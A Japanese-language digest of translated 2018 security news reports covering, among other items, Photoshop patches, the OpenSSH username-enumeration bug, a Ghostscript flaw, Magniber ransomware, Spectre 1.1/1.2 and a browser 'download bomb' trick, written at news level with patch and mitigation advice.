     GitHubへの投稿で、開発者Felix Riesebergは、この新しいElectronアプリケーションをインストールし実行することで、完全なWindows 95を得ることができるだろうと説明している。このWindows 95 Electronアプリケーションのサイズは、凡そ100MBであり、Windows 10デバイス上で実際に良好に動作している。


    Windows 95

     「私は、Windows 95をmacOS, Windows, Linuxで動作するElectronアプリケーションにした。このとんでもないアイデアは驚くほど上手く動作する」と、開発者Felix RiesebergはTweetしている。
     興味があるのなら、Windows, Mac, Linux用のWindows 95 Electronアプリケーション・パッケージをダウンロードするためにGitHubのページを訪問しなさい。Windowsコンピュータを持っているのであれば、Windows 95 Setup exeをダウンロードする必要がある。使用するにはこのアプリケーションをダブルクリックしなさい。数分で、あなたのコンピュータは、フル機能のWindows 95オペレーション・システムを実行するだろう。


    Adobe: Photoshop CC中の予想外の「緊急」の修正をリリース
    Sophos : Naked Security (2018/08/23)
     Adobeの月例のパッチから僅か1週間、Adobeは、WindowsとmacOS用のPhotoshop Creative Cloud (CC)に影響を与える二つの緊急の脆弱性の急を要する修正をリリースすることになった。
     これは多分、定例外(通常、積極的に悪用されている脆弱性に関して予約されている)と言うより予期しなかったものとして認定されるが、Photoshop CCのユーザは、適当な期間内にこれらの修正を適用すべきである。
     この脆弱性のあるバージョンは、WindowsもmacOSも共にPhotoshop CC 2018 v19.1.5 及び それ以前のバージョンと、Photoshop CC 2017 v18.1.5 及び それ以前のバージョンである。
     このアップデートされたバージョンは、Photoshop CC 2018 v19.1.6 と Photoshop CC 2017 v18.1.6である。この脆弱性は、Adobe識別子APSB18-28の下にCVE-2018-12810CVE-2018-12811として参照される。アップデートは、ヘルプ>アップデート で適用される。
     FortinetのKushal Arvind ShahによってAdobeに通知されたこのバグは、悪意あるファイルによって引き起こされるものであり、脆弱性のカテゴリとしてはメモリ損壊、脆弱性の影響としてはリモートコード実行(RCE)という事実を除いて詳細は未だ明らかになっていない。

    Adobeセキュリティ・ブレティンの説明

     悪用が成功すると現在のユーザのコンテキスト中で任意のコード実行が発生する。

     この修正は、僅か優先度3であるにも拘わらず「緊急」に評価されている。これに関するAdobeの見解が以下である。

     このアップデートは、製品中の今まで攻撃者によって標的とされていなかった脆弱性を解決する。Adobeは管理者の判断でこのアップデートをインストールするように推奨する。

     Photoshop CCの最後の重要な修正は、CVE-2018-4946の解決として5月にリリースされたが、先週のパッチ群は、Windows用のCreative Cloud Desktop Applicationインストーラ(バージョン4.5.0.324 及び それ以前)中のフローをパッチしたCVE-2018-5003を含んでいた。
     Photoshop CCをパッチすることが仕事のように感じるのであれば、Flash Playerのことを検討してみなさい。未だFlash Playerを稼働しているマゾヒストの方々へ、2018年に於いて、Adobeは19個のCVE(先月の修正分を含む)を作成している、そして、まだ8月である。


    過去20年間にリリースされた全てのOpenSSHのバージョンに影響を与える脆弱性
    BleepingComputer : News>Security (2018/08/22)
     この脆弱性は、過去20年間(このアプリケーションが1999年にリリースされて以来)にリリースされたOpenSSHクライアントの全てのバージョンに影響を与える。
     このセキュリティバグは、今週パッチを受け取ったが、OpenSSHクライアントは多数のソフトウェアやハードウェア・デバイスに埋め込まれているので、影響を受ける全てのシステムに、この修正が行き渡るには数年はかからなくとも数ヶ月はかかるだろう。

    OpenSSHで発見されたユーザ名列挙型のバグ

     この特定のバグは、OpenBSDのOpenSSHソースコード中にコミット(【訳註】 データベースの更新処理を正常に完了させて更新内容を確定させることを「コミットする」という(実用日本語表現辞典より))を見つけたQualysのセキュリティ研究者によって先週発見された
     このコミットを解析した後、研究者達は、このコードが、作成以来OpenSSHクライアント中で深い眠りについていたセキュリティバグを偶発的に修正したことを明らかにした。
     このバグは、リモート攻撃者がOpenSSHサーバ上に登録されているユーザ名を推測することを可能にする。OpenSSHは、クラウド・ホスティングサーバからマンデートIoTに至るまでの数多くの技術範囲で使用されているため、数十億のデバイスに影響を与える。
     研究者の説明では、この攻撃シナリオは、不正な認証要求(例えば、切り詰められたパケット)を介してOpenSSHエンドポイントで認証しようとする攻撃者に依存している。
     脆弱性のあるOpenSSHサーバは、これが発生したとき、大きく異なる二つの方法で反応する。不正な認証中に含まれているユーザ名が存在しない場合、このサーバは認証失敗を返すことで対応する。ユーザ名が存在した場合には、このサーバは、何も戻さずに接続を閉じる。
     この簡単な挙動に関する説明は、攻撃者がSSHサーバに登録されている正当なユーザ名を推測することを可能にする。実在するユーザ名を知ることは、即座に危険を引き起こさないかもしれなが、ブルートフォースや辞書攻撃(【訳註】 パスワードの割り出しや暗号の解読に使われる攻撃手法で辞書にある単語を使う方法のこと(セコムトラストシステムズより))でそのユーザ名は、そのパスワードを推測することができる。
     OpenSSHはインストールベースで膨大な数に上るため、このバグは高い価値を持つ標的への攻撃だけでなく、大量攻撃のシナリオでも理想的なものである。

    バグは先週パッチされた。「概念の実証」(PoC)コードはオンライン上にある

     このバグ(CVE-2018-15473として追跡される)は、OpenSSHの安定版(1:6.7p1-1 と 1:7.7p1-1)と不安定版(1:7.7p1-4)でパッチされた。このパッチは、Debianおよび、十中八九他のLinuxディストリビューションに行き渡っている。
     サーバに脆弱性があるか否かをテストするための「概念の実証」コードは様々な場所(1, 23)で利用可能になっている。

    Justin GardnerのTwitterへのリンク

     NVISO LabsのDidier Stevensは、このバグに対してサーバをテストするためのステップ・バイ・ステップのチュートリアルを公開した。このブログは、脆弱性あるサーバに対するこのバグの悪用の企てを暴く可能性のあるOpenSSHイベントをログする情報を含んでいる。

    軽減策も利用可能である

     諸般の事情からパッチをインストールできないシステム管理者は、様々な軽減策(OpenSSH認証を無効化する、あるいは、リモートデバイスにログインするための代替方法を使用したりするような)を適用することができる。
     これが、オプションではなく、OpenSSHクライアントがデバイスに接続する唯一の方法であるなら、システム管理者は、OpenSSHの"public key authentication"(公開鍵認証)方法を無効にすることができる。ここが、脆弱なコードが存在している場所である。
     これは、システム管理者がOpenSSHの認証鍵を使用不可能にすることを意味しているので、デバイス上のOpenSSHを介してログインする度にユーザ名とパスワードを入力しなければならなくなるだろう。


    Ghostscriptインタープリター中に新しく重大な脆弱性。パッチは未だ利用可能になっていない
    BleepingComputer : News>Security (2018/08/22)
     Tavis Ormandy(Google Project Zeroのセキュリティ研究者)は、Ghostscript(AdobeのPostscriptとPDFページ記述言語用インタープリター)中に発見された新しく重大な脆弱性に関する詳細を明かにした。
     Ghostscriptは、その種類で最も広汎に使用されているソリューションである。Ghostscriptインタープリターは、数百の統合型ソフトウェアや、デスクトップ・ソフトウェアやWebサーバーがPostScriptやPDFベースのドキュメントを取り扱うことを可能にするコーディング・ライブラリに埋め込まれている。
     例えば、あなたは、ImageMagick, Evince, GIMP, すべてのPDF編集ソフトや視聴用ソフトウェアの内部TにGhostscriptを見出すだろう。

    バグの悪用はリモート・システムの乗っ取りを引き起こす

     Ormandyが発見したバグの悪用は、攻撃者が悪性化されたPostScript, PDF, EPS, もしくはXPSファイルを犠牲者に送信することを要求する。このファイルがGhostscriptインタープリターに辿り着くと、内部に含まれている悪意あるコードは、そのマシン上で攻撃者が求めていることを実行する。
     この脆弱性(CVE識別子は未だ取得されていない)は、攻撃者がGhostscriptの脆弱性のあるバージョンを使用しているアプリケーションやサーバを乗っ取ることを可能にする。
     記述している時点で、未だ修正は利用可能になっていない。
     圧倒的に、最も影響を受けるプロジェクトは、ImageMagicイメージ・プロセス・ライブラリであるが、このライブラリをDefaultで出荷している多くのLinuxディストリビューションもまた影響を受ける。本日リリースされたCERT/CCセキュリティ・アドバイザリによれば、RedHatとUbuntuは、彼らが影響を受けるということを既に確認している。
     「私は、[Linux]ディストリビューションが、[ImageMagick's] policy.xml中のPS, EPS, PDF, XPSコーダーをDefaultで無効にすることを強く推奨する」と、Ormandyは述べている。

     Tavis OrmandyのTwitter 8月21日

    Ghostscriptのバグは危険であり大変引く手数多である

     Ghostscriptは、Web開発やソフトウェア開発コミュニティーで広範に採用されているため、過去数年間Ghostscriptに目を向けてきた。
     彼は、2016年に、そして、2017年に再びGhostscriptに影響する類似の大変深刻な問題を発見している。
     彼が、2017年に発見した脆弱性(CVE-2017-8291)は、北朝鮮のハッカー集団(韓国の仮想通貨交換所に侵入し、資金を盗み、その後、中国語圏の攻撃者グループのハッキングに見せかけるように偽のフラグを植え付けた)によって採用されていた。
     Ghostscriptが広汎に採用されているために、あらゆるバグ、とりわけリモートコード実行を引き起こすバグは、あらゆる脅威をもたらすグループによって大変引く手数多である。


    研究者によると、仮想通貨交換所はセキュリティを完全に保証していない
    Bitdefender : Hot for Security (2018/08/09)
     2017年、多くのリスクテイカー(危険を冒す人)がBitcoinの波に乗って小さな富を成し遂げたが、一部の人は、アカウントをハックされ、仮想通貨の財布を空にされ涙で終わっている。このような不運な出来事に関して、仮想通貨ウォレットの所有者を非難する誘惑にかられるかもしれないが、ことはそのように単純ではない。
     仮想通貨交換所からの二年分のデータリークの調査は、ハッカーが仮想通貨交換サービスをハッキングすることに苦労していないことを明らかにしている。格好の事例は、6月に韓国のCoinrailで、凡そ2800万ポンド(3600万ドル)がハッカーの手に落ちた事件である。仮想通貨の支持者達は、このサイバー攻撃が即座にBitcoinの価値を10%下落させたことを思い出すだろう。
    2016年から2017年に、Group-IB(【訳註】 ロシアに本部を置くハイテク犯罪やオンライン詐欺を防止し調査するリーディングカンパニーの一つ(ホームページより))は、仮想通貨関連のデータリークが、369%まで上昇し、2018年の1月に記録を打ち立てていたことを発見した
     「仮想通貨とブロックチェイン産業への関心の増大に起因して、1月、事件の数は、2017年の月平均に比較して689%に跳ね上がった」と、研究者は発言している。
     アメリカ、ロシア、中国が主たるターゲットである、そして、この攻撃の第三位にランクされる犠牲者はアメリカ人である。米国は仮想通貨ハッカーに属している犯罪C&Cサーバ(コマンド・アンド・コントロール サーバ)の56.1%をホストさせている。以下、オランダ(21.5%)、ウクライナ(4.3%)、ロシア(3.2%)と続いている。
     攻撃者は、単純なソーシャル・エンジニアリングから、AZORult、Pony Formgrabber、Qbotのようなツールを活用したより複雑なトロイの配備に至る範囲のテクニックを使用している。サイバー犯罪者はまた、今まで銀行攻撃に使用されていたツールを別の目的で使用している。
     何故、仮想通貨交換所が、このように無防備なのか?
     研究者によると、この答えは、信じられていることより単純である。即ち、「情報セキュリティを無視し、サイバー犯罪者の能力を過小評価している。 第1で且つ主な原因は、ユーザと取引所の双方が二要素認証を使用していないことである。 第2の原因は、複雑でユニークなパスワードの使用など、基本的なセキュリティルールを無視していることである。」
     720のアカウントの解析から、Group-IBは、アカウントの1/5が8文字以下のパスワードを使用していることを発見した。脆弱なパスワードが、ブルートフォース攻撃を成功させることを考慮すると、危険な実装と言わざるをえない。
     ハックされた他の交換所(Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniexを含む)での事件を解析した後、研究者は以下の結論を導いている。
     「規模や実績に関係なく、現在、ユーザに絶対的なセキュリティを保証している仮想通貨交換所は存在していない。」
     この身も凍るような結論だけで、Bitcoinの流行に乗って高価な商品を販売した人達の背筋をゾッとさせるはずである。さもなければ、少なくとも、彼らに、より強力なパスワードを設定するよう促さなければならない。
     他の攻撃は、以下(ソフトウェアのソースコード中のエラー、フィッシング攻撃、ユーザデータベースへの不正アクセス、ストレージに関連した脆弱性、資金の引き出し)を含むことが研究者によって同定された。
     「しかしながら、それらの全ては、情報セキュリティとデジタル資産の保護への関心の欠如に由来している」と、研究者は強調している。
     仮想通貨交換所に関する限り、彼らが実行しているビジネスの種類と、違反が彼らの顧客の生活にどのように影響を与えるのかということを考慮すると、二要素認証は、顧客のアカウントを保護するための必要最低限である。残念ながら、仮想通貨交換所のどれもが、この実装を実施していないと、研究者は明らかにしている。


    危険警告: FCM#135(Full Circle Magazine Issue 135)サイト・リダイレクト
    Full Circle Magazine : WebSite (2018/07/28)
     Full Circle Magazine Issue 135は、昨日リリースされるはずだったが、私はリリースを控えている。これは、このサイトが(またも)リダイレクトに感染させられたからである。そこで、どうかスパムサイト(このサイトの末尾は、.tkである。私はフルネームでそれらの名前を見るという楽しみのために、そのようなサイトには行かない)にクリックスルー(【訳註】 ハイパーリンク(とりわけ、広告)をクリックしてスパムサイトのようなWebサイトに移動すること)しないでください。そのサイトは、フロント・ページ上のリンクをクリックすれば見ることができる。
     FCMを発行しているページは依然として安全なので、直接ダウンロードすることはできる(例えば、fullcirclemagazine.org/issue-134)。
     Lucasは、バケーションの最中であるが、このサイトを修正しようとして奮闘中である。我々はまた、全く新しいサイトの設計とWordPressを放棄することを検討中である。我々は試行し、この種の問題を停止する幾つかの準備をしている(その一つは、ホスト端末でのスキャンである)。しかし、我々は未だ問題を持っている。
     FCM#135は、Lucasが問題の根源に達したらリリースされるだろう。リリースされたら直ちにeMailを受け取るには、メーリングリストに参加されたい。


    Bitdefenderが、LockCrypt身代金要求型マルウェアの古いバージョンの復号ツールをリリースした
    BleepingComputer : News>Security (2018/07/21)
     ルーマニアのアンチウィルス企業Bitdefenderが昨日、LockCrypt身代金要求型マルウェアの古いバージョン(.1btc 拡張子でファイルをロックしているバージョン)によって暗号化されたファイルを復元する復号ツールをリリースした。
     LockCrypt身代金要求型マルウェアのこのバージョンは、2018年2月から5月末までアクティブであった。その後、この開発者は、.BI_D 拡張子でファイルをロックする新しいバージョンを開発している。
     このBitdefender復号ツールは、LockCrypt身代金要求型マルウェアの現在のバージョンに関しては役に立たないが、.1btcで暗号化されているファイルのコピーを未だ持っているユーザは、ファイルを復元するために、このツールを使用することができる。このツールのインターフェースは一目瞭然なので、使用方法は大変分り易い。
     BitdefenderチームがLockCryptの暗号化をクラックできたのは驚くにあたらない。LockCrypt身代金要求型マルウェアは、酷い暗号化を使用していることで知られている。Malwarebytesは、4月のレポートで、この身代金要求型マルウェアの欠陥ある暗号化ルーチンを説明している。
     セキュリティ研究者Michael Gillespieは、一年以上に渡り、LockCrypt身代金要求型マルウェアの複数のバージョンで暗号化されたファイルを復号するための支援を続けてきている。
                            
    LockyCryptのバージョン 状況
    .BI_D復号できない
    .1btcBitdefenderツールで復号可能
    .lock復号可能(Michael Gillespieにコンタクトしなさい)
    .2018復号可能(Michael Gillespieにコンタクトしなさい)
    .mich復号可能(Michael Gillespieにコンタクトしなさい)
     LockyCrypt身代金要求型マルウェアは、ハッカーがRDP接続を介して企業のネットワークに侵入するためにブルートフォース攻撃を使用した後に犠牲者に感染し、次に、手動でこの身代金要求型マルウェアのバイナリを実行する身代金要求型マルウェア(ランサムウェア)株である。
     この身代金要求型マルウェアは、2017年6月に最初に発見された。セキュリティ研究者は、Satan Ransomware-as-a-Service(【訳註】 知識を持つサイバー犯罪者が、ランサムウェアを利用した自作のサービスを「Ransomware as a Service(RaaS)」として、新人や志望者向け材料キットの形で提供すること(トレンドマイクロ・セキュリティブログより))ポータル上で以前活動していたグループ中にその製作者を追跡した


    Microsoft EdgeのXSSフィルターは壊れているようである
    BleepingComputer : News>Security (2018/07/21)
     サイバーセキュリティ企業PortSwiggerのセキュリティ研究者Gareth Heyesによると、Microsoft Edgeに含まれているセキュリティ機能は、動作を停止していたようである。
     疑問視されているセキュリティ機能は、"XSS Filter"であり、これは、ブラウザ内部で基本的なクロスサイトスクリプティング(XSS)攻撃を妨げるMicrosoftが開発したセキュリティ・メカニズムである。
     Microsoftは、2008年にXSS Filterを開発し稼働した。この機能は、Internet Explorer 8に最初に搭載されたが、Edgeで拡張され、Google ChromeやSafariのような他のブラウザにも配備された。

    XSS Filterの動作方法

     このセキュリティ機能は、"X-XSS-Protection"として知られている。この名前で知られている理由は、Webサイトのオーナが、彼らのサイトを提供するサーバに"X-XSS-Protection"と名付けられたHTTPヘッダーを構築することができるからである。
     ブラウザが、これらのサイトのページをロードし、このヘッダーを検出した時、ブラウザは、そのヘッダーの値に準拠してXSS Filterプロテクションを実行する。ヘッダーの値を以下に示す。

    X-XSS-Protection: 0
    X-XSS-Protection: 1
    X-XSS-Protection: 1; mode=block

     ブラウザが、"X-XSS-Protection: 0"を確認すると、ブラウザは、XSS Filterプロテクションを無効にする。
     ブラウザが、"X-XSS-Protection: 1"を確認すると、ブラウザは、ページのコードを無害化(サニタイズ)し、XSS攻撃特有のパターンを削除する。
     ブラウザが、"X-XSS-Protection: 1; mode=block"を確認し、XSS攻撃特有のパターンを検出すると、ブラウザはそのページ上のあらゆるコンテンツのレンダリング(表示)をブロックする。
     ここ3年間(Edgeがリリースされて以来)、EdgeはDefaultの設定として二番目の値を使用してきた。これは、そのページがXSS-Protectionヘッダーを構築しているか否かに拘わらず、Edgeは、ロードされたあらゆるページのコードを無害化しようとしていたことを意味している。

    EdgeのXSS FilterはDefaultで起動していない

     今週、Heyesは、Edgeが、XSS Filter設定に関して思われているように挙動していないことを発見した。
     「このXSS Filterは、DefaultでONになっていなければならない」と、「しかしながら、現在、DefaultでOFFである。そして、あなたが、X-XSS-Protection: 1でONにした場合でさえ、OFFのままである」と、Heyesは発言している。
     全てのサイトに関して、XSS FilterがDefaultでOFFになっている理由は、MicrosoftやEdgeチームから公式のアナウンスがないので不明である。
     これはMicrosoftの意図的な再構成ではなく、バグであるように思われる。
     これは、この機能がInternet Explorer(Microsoftのもう一つのブラウザ)中で意図したように動作するためであり、Internet Explorerでは、今もなおDefaultでONである。Microsoftが、この機能を削除したいのであれば、彼らの二つのブラウザからこの機能を削除することになるだろう。
     更に、XSS Filterは、今もなおEdgeで有効にすることができるが、Webサイトが明確に三番目(最高度のセキュリティレベル設定、殆どのWebサイトのオーナーが使用することを回避している)を使用していると、この設定は、最終的にEdgeがサイトを表示することを妨げる。
     実際にこの機能が機能する唯一の方法は、あなたが、X-XSS-Protection: 1; mode=blockヘッダーを持っている時である」と、Heyesは記述している。
     Microsoftのスポークスマンは、Bleeping Computerの問い合わせに応答していない。Microsoftは、PortSwiggerが今週初めにコメントを求めた時、「共有するものは何もない」と発言している。

    XSS Filterを削除するケース

     しかし、PortSwiggerの研究者は、Microsoftが本当にその方向に進むのであれば、XSS Filterを削除することは良いアイデアかもしれないとして、多くのセキュリティ研究者がこの件で泣き喚かなくて良くなるだろうとして、彼らはXSS Filterを削除した場合を構築した。
     第一に、多くの研究者が、この機能をバイパスした。あるいは、基本的なブラウザで別の攻撃を実行する[1, 2, 3]ために、これを乱用した。
     第二に、Mozillaは、この機能のサポートを決して表明しておらず、この機能がクロスブラウザ対応のアンチ-XSSメカニズムになる可能性を妨げた。
     第三に、MDNポータル(Web機能に関する公式のドキュメンテーション・サイト)によると、このXSS機能は、以前のように重要なものではない。つまり、
     これらの防御は、サイトが、インラインJavaScriptの使用を無効にする強力なContent-Security-Policy(CSP、コンテンツセキュリティポリシー、【訳註】 クロスサイトスクリプティング (XSS) やデータインジェクション攻撃などのような、特定の種類の攻撃を検知し、影響を軽減するために追加できるセキュリティレイヤー(MDN web docsより))を実装している時には、モダン・ブラウザにとっては不必要なことが多いが、これらの防御は、未だにCSPをサポートしていない古いWebブラウザのユーザにとっては、依然として防御を提供することができるものである。
     第四に、この機能はしばしば、Webサイトのオーナーによって誤って理解され誤った設定がなされている。それ故、この機能はめったにその真価を発揮していない。
     それ故、これがバグであれ、Microsoftが作為的に無効化している場合であれ、この機能は、初めから殆ど支持者を持っていないようである。


    Magniber身代金要求型マルウェアは、他のアジア諸国をターゲットにするために韓国から拡散している
    BleepingComputer : News>Security (2018/07/16)
     9ヶ月に渡り韓国ユーザーだけをターゲットにしてきたMagniber身代金要求型マルウェアが、ターゲットの範囲を拡大し、今や、PCの言語設定が中国語圏(マカオ、中国、シンガポール)やマレー語圏(マレーシア、ブルネイ)になっているユーザにも感染する能力を持っている。
     この変更は、独立系セキュリティ研究者MalwareHunterによって、7月5日に最初に発見された。幾人のセキュリティ研究者と共にBleeping Computerは、この問題を監視していた。

    MalwareHunterTeamのTwitter
     長い間、韓国だけをターゲットにしてきたMagniber身代金要求型マルウェアは、今、世界的脅威である。ここ数日、我々は、台湾と香港で複数の犠牲者を、そして、他の国から数人の犠牲者を確認した。
     2018年7月5日 10:38

    Magniber身代金要求型マルウェアは今迄、韓国に居住するユーザと、その地域に特有のPC言語設定を持つユーザに関してのみファイルの暗号化を行ってきた。しかし、しばしば韓国ユーザは、海外旅行中や、韓国IPでプロキシを使用している間に感染させられている。
     セキュリティ研究者が数人の犠牲者を確認し、Magniberが他の国に拡散しているという結論に達した過去のある時点では、そのような誤った警告も存在した。

    韓国外への拡散が確認された

     しかし今回は、真実のようである。Malwarebytesの研究チームは、最近拡散と、この身代金要求型マルウェアのバイナリ中に重要な変更を発見した。
     このアメリカに本拠を置くアンチウィルスメーカーは、Magniberコード中に、韓国以外のユーザを追い求める新しいターゲットシステムに合致する変更を発見したと発言している。
     更に、全体のソースコードは今、より高品質なものになっていると、二人のMalwarebytes研究者は本日の技術的分析中で記述している。
     「ソースコードは、より洗練され、様々な複雑なテクニックを活用している。そして、もはやコマンド&コントロールサーバや、暗号化ルーチン用のハードコードされたキーに依存していない」と、この二人は発言している。

    Magnitude EKもまた、変更された

     これらの変更に関する理由は不明であるが、それらはまた、Magnitudeエクスプロイトキット(過去9ヶ月間、Magniber感染の唯一の供給源)にも影響を与えている。Magniberの"magni"は密接な関係を持つMagniberが由来である。
    Magniberに先立って、この同じエクスプロイトキットは、Cerber身代金要求型マルウェア(世界中の全てのユーザをターゲットにしたマルウェア株)でユーザに感染していた。
     新たに配布され、Magniberバージョンに改悪されたMagnitudeは、この身代金要求型マルウェアが今や、今迄のCerverバージョンと同じレベルの「品質」であることを示している。そして我々は、もっと多くの国々に拡散していることを徐々に確認することになるだろう。

    新しいMagniberキャンペーンは、以前のIEの0-Dayを使用している

    Malwarebytesによると、この新しく改悪されたMagniberバージョンを配備していることが確認されている最近のMagnitudeエクスプロイトキット・キャンペーンは、4月に発見され、5月にパッチされ、6月まで他のエクスプロイトキットによって採用されていたInternet Explorerの0-Dayを悪用している。
     我々が、今迄のストーリー中で説明してきたように、エクスプロイトキットは、モダンブラウザに対しては、むしろ失敗する。これは、Microsoftのブラウザ以外のブラウザをアップデートして利用しているユーザは、これらの攻撃からは安全なはずである。
     この最近のMagniberバージョンで暗号化されたファイルを所有するユーザは、ロックされたファイルの末尾に".dyaaghemy"拡張子が追加されていることで同定することができる。記述している時点で、Magniber身代金要求型マルウェアによって暗号化されたファイルを復元する方法は知られていない。


    明らかになった新たなSpectre 1.1、Spectre 1.2 CPUフロー
    BleepingComputer : News>Security (2018/07/11)
     二人のセキュリティ研究者が、二つの新しいSpectreに分類される脆弱性の詳細を明らかにした。彼らは、これらのフローをSpectre 1.1、Spectre 1.2と名付けている。
     今までの全てのMeltdownとSpectre CPUバグの異形と同様に、これら二つのフローは、投機的実行のプロセス(予めオペレーションをコンピューティングしておくことによってパフォーマンス改善し、その後、不要なデータを廃棄する役割を持つ全てのモダンCPU中で発見される機能)を利用するものである。

    Spectre 1.1、Spectre 1.2の簡単な説明

     研究者によると、Specter 1.1の攻撃は、投機的実行を使用し、CPUストアのキャッシュバッファをオーバーフローさせるコードを提供し、以前に確保されたCPUメモリセクションからデータを取得する悪意のあるコードの書き込みを実行する。
     Spectre 1.1はSpectreの異形1と4に大変類似しているが、このバグを発見した二人の研究者は、「現在、効果的な静的解析やコンパイラ・インスツルメントは、Spectre 1.1を一般的に検出し軽減するための役には立たない」と、発言している。
     Spectre 1.2に関して、このバグは、通常、リードオンリー・フラグによって保護されているCPUメモリセクターに書き込むことで悪用することができると、研究者は発言している。
     「(悪意あるSpectre 1.2書き込みの)結果として、サンドボックス化は、リードオンリー・メモリのハードウェア強制に依存しているため効果がなくなる」と、研究者は発言している。
     悪用するには、今迄の殆どのMeltdownとSpectreバグ同様に、この二つの脆弱性は、ユーザのPC上に悪意あるコード(攻撃を実行に責任を持っているコード)の存在を要求する。これは、これらのバグの深刻さを多少制限するが、パッチが利用可能になった時に、システム管理者がパッチの適用に失敗することは言い訳にならない。

    これらのバグは、Intel、ARM、そして、まず間違いなくAMDにも影響を与える

     IntelARMは、彼らのCPUの一部が、Spectre 1.1に脆弱性のあることを公に認めている。AMDは、声明を発表していないが、伝統的にセキュリティ問題の検証が緩慢である。全Spectre攻撃は、AMDのCPUに影響を与えているので、今回の新しい攻撃も、同様にAMDの製品群に影響を与えると仮定したほうが安全である。
     研究者は、Spectre 1.2に影響を受けるCPU情報をリリースしていない。現時点で、どちらのバグにも利用可能なパッチは存在していないが、MeltdownとSpectreフローの取り扱いに関するIntelのガイドは、脆弱性を緩和するために、アプリケーション・レベルで、開発者がどのようにソース・コードを検査し修正することができるかについての情報を含んでいる。
     Microsoft, Oracle, Red Hatは、彼らの製品によって取り扱われるデータがSpectre 1.1の影響を受けるか否か依然として調査中であると、ソフトウェア・レベルで、このリスクを緩和するための方法を検討中であると発言している。
     この論文(Speculative Buffer Overflows: Attacks and Defenses)において、これらのフローを発見した二人の学者は、Spectre 1.1攻撃とSpectre 1.2の一つを防御するためにハードウェア・ベースの緩和策を提案した。  Intelは、今研究チームに対して、Intelが最近稼働させたバグバウンティ・プログラム(脆弱性報奨金制度、オリジナルのMeltdownとSpectre脆弱性の発覚後にIntelが設立した)に基づき、このバグの発見に関し$100,000(約1100万円)の報奨金を支払った。これは、現在までに知られている最高額の報奨金の一つである。
     あなたが、最近のMeltdownとSpectre関連のバグを全て忘れているのであれば、我々は、あなたが全ての変種を把握するための役に立つよう以下のテーブルにまとめておく。                                                                                                                                                                
    変種 説明CVEコードネーム影響を受けるCPU詳細な情報
    Variant 1境界チェックバイパスCVE-2017-5753Spectre v1Intel, AMD, ARM Webサイト
    Variant 1.1ストア上の境界チェックバイパスCVE-2018-3693Spectre 1.1Intel, ARM 論文
    Variant 1.2読み取り専用の保護対策バイパス定められていないSpectre 1.2Intel, ARM 論文
    Variant 2分岐先の書き換えCVE-2017-5715Spectre v2Intel, ARM, AMD Webサイト
    Variant 3不正なキャッシュアクセスCVE-2017-5754MeltdownIntel Webサイト
    Variant 3a不正なシステム・レジスタの読み出しCVE-2018-3640Intel, ARM, AMD, IBM Mitre
    Variant 4投機的ストア・バイパスCVE-2018-3639SpectreNGIntel, ARM, AMD, IBM Microsoftブログ投稿


    ダウンロード爆弾(Download bomb)トリックは、Chromeに回帰しているが、Firefox, Opera, Vivaldi, Braveにも影響を与える。
    BleepingComputer : News>Security (2018/07/03)
     Google Chrome 67のリリースは、昨冬技術サポート詐欺師によって悪用された「ダウンロード爆弾」バグ(このバグは、2018年3月のChrome 65のリリースで修正されていた)を再び開いた。
     更に、この問題は、Bleeping Computerによって実行されたテストによって、他のブラウザ(Firefox, Opera, Vivaldi, Brave)にも同様に影響を与えるようである。

    回帰した「ダウンロード爆弾」トリック

     「ダウンロード爆弾」トリックは、特定のページでブラウザをフリーズさせるために数百もしくは数千のダウンロードを開始するテクニックである。
     数年に渡り、ダウンロード爆弾の複数の亜種が存在した。そして、それらは、しばしば、いかがわしいサイトにユーザを閉じ込め、ユーザのブラウザのロックを解除するには技術サポート番号に電話するように犠牲者を誘導するために技術サポート詐欺師によって使用された。
     冬の間に、Malwarebytesの研究者達は、ユーザを、そのいかがわしいサイトにユーザを閉じ込めるための新しい「ダウンロード爆弾」を利用した技術サポート・スカム・キャンペーンに気が付いた
     このテクニックは、技術サポートサイト上でChromeブラウザをフリーズさせるために、数千のダウンロードを次から次へと開始するために、JavaScript Blobメソッドとwindow.navigator.msSaveOrOpenBlob関数を使用していた。


    フリーズしているChromeのユーザインタフェース(画像をクリックすると拡大します)

     Googleの開発陣は、このキャンペーンに気が付き、Chrome 65.0.3325.70でこの問題を修正した。
     しかし、この問題のオリジナル・バグレポートでの応答によると、この問題は6月12日にリリースされたGoogle Chrome 67.0.3396.87で復活した。
     「このバグは、67.0.3396.87で再び回帰させられた」と、この問題を見つけた、このユーザは発言している。「(私は)、私のブラウザをフリーズさせるスカム・サイトへの悪意あるリダイレクトによって、この問題を偶々見つけた」と彼は続けている。
     他のユーザも、最新のChromeが再びダウンロード爆弾に感染しやすくなっているとする彼の発見を確認している。

    ダウンロード爆弾テクニックはまた、他のブラウザにも影響を与える

     しかし、この問題は当初考えられていたより広がりを見せてきている。2月に、この問題を最初に解析したMalwarebytesのセキュリティエキスパートJerome Seguraは、Firefoxも影響を受けることを指摘していた。
    Bleeping Computerは、他のブラウザをテストするために今迄のChromeFirefox用の概念の実証(proof-of-concept、PoC)を使用した。我々のテストによると、BraveとVivaldiも、この概念の実証(proof-of-concept、PoC)を稼働した時フリーズした。
     Operaも短時間フリーズしたが、最終的に我々は、PoCタブから切り替えることが可能だった。けれども、継続的なダウンロードがバックグラウンドで依然として発生していたので、我々は、このブラウザを閉じるためにWindows Task Managerを使用する必要があった。
     我々のテストは、Microsoft EdgeとInternet Explorerが影響を受けないことを明らかにした。
     あなたが、このトリックを使用している技術サポートサイトに到着し、あなたのブラウザが最後にアクセスしたサイトを開くように設定されているのであれば、ダウンロード爆弾が開始される前に、技術サポートサイトのタブを閉じることが可能である。
     これは、技術サポート・スカムWebサイトが、完全にページをロードした後に、ダウンロード爆弾コードをロードするためである。このため、ユーザは、ブラウザUIがフリーズするまでの数秒が与えられているので、この間に、そのタブを閉じることができる。


    Dr Symantecは、ルータ上のVPNFilterの脅威に関する手っ取り早くて簡単なチェックを提供している
    The Register : Security (2018/07/02)
     VPNFilterマルウェアに対応するためのクリーンアップの努力はフリーの診断ツールのリリースで加速された。
     Symantecのユーティリティは、感染を確認するのではなく、トラフィックが操作されているか否かを確認するだけのものであるが、それにも拘わらず、サードパーティの専門家は、そのリリースを歓迎している。  5月にCisco Talosのセキュリティ研究者によって発見されたVPNFilterは、ルータ、NASデバイスのような50万ものIoTデバイスをハイジャックしていると見積もられている。
